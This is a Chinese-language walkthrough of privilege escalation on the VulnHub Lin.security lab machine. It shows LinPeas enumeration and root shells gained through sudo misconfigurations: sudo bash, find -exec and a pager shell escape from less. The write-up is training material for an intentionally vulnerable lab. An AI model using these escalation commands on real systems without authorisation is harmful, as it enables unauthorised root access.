【Vulnhub通关】Lin.security


准备工作

靶机基本信息

靶机名称:Lin.security 1
操作系统:Linux
网络连接方式:桥接至物理网络
渗透测试目标:提权至root用户
靶机登录信息:bob/secret

下载地址:1. Lin.Security: 1 ~ VulnHub

2. vulnhub靶机_免费高速下载|百度网盘-分享无限制(推荐VMware版)

环境配置

从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Lin.security.ovf文件打开后即可导入靶机。使用上面给出的登录凭据即可登录系统进行提权练习。

P.S. 本台靶机只有权限提升部分哦~


权限提升

本地信息收集

登录系统之后,首先上传LinPeas工具进行信息收集。

系统基本信息

部分CVE漏洞信息

容器软件信息

系统进程信息

计划任务信息

系统用户信息

特殊权限文件

Sudo命令

bash提权

因为使用sudo命令之后发现可以运行各种终端,因此我们可以直接使用sudo运行终端软件提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

常用命令提权

除了各种终端软件,我们还可以使用诸如awkfind这种命令进行提权。下面介绍find命令提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo find . -exec /bin/bash \; -quit
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

find命令有一个可以用于执行任意系统命令的危险参数-exec 这里允许使用sudo运行find命令,因此该命令会以root权限执行/bin/bash

文本分页查看工具提权

一些可以分页查看文本的工具,诸如lessmoreman等,在其文本查看界面可以使用!符号执行系统命令,但前提是必须使用这些工具查看大文件(如/var/log/syslog),这样才能触发它们的分页查看功能。

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo less /var/log/syslog
[sudo] password for bob: 
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

本次靶机渗透到此结束

相关推荐
熙客43 分钟前
网络安全:OWASP防护守则
安全·web安全
藥瓿锻1 小时前
2024 CKS题库+详尽解析| 1. kube-bench 修复不安全项
运维·安全·docker·云原生·容器·kubernetes·cks
电报号dapp1191 小时前
中心化交易所(CEX)架构:高并发撮合引擎与合规安全体系
安全·架构·去中心化·区块链·智能合约
weixin_425878232 小时前
GitOps 中的密钥管理 - 安全处理敏感信息
安全·secret
领世达检测V133529092492 小时前
智能云打印机EN 18031申请认证流程
安全·web安全
不念霉运4 小时前
关键领域软件测试新范式:如何在安全合规前提下提升效率?
软件测试·测试工具·安全·开源·desecvops·ci/di
工程师0075 小时前
C#AES加密
网络·安全·web安全·c#
塔子终结者5 小时前
网络安全A模块专项练习任务七解析
安全·web安全·网络安全
电院工程师6 小时前
ChipWhisperer教程(三)
笔记·python·嵌入式硬件·安全·fpga开发·安全架构
厦门辰迈智慧科技有限公司6 小时前
水库大坝安全监测之渗流监测
网络·物联网·安全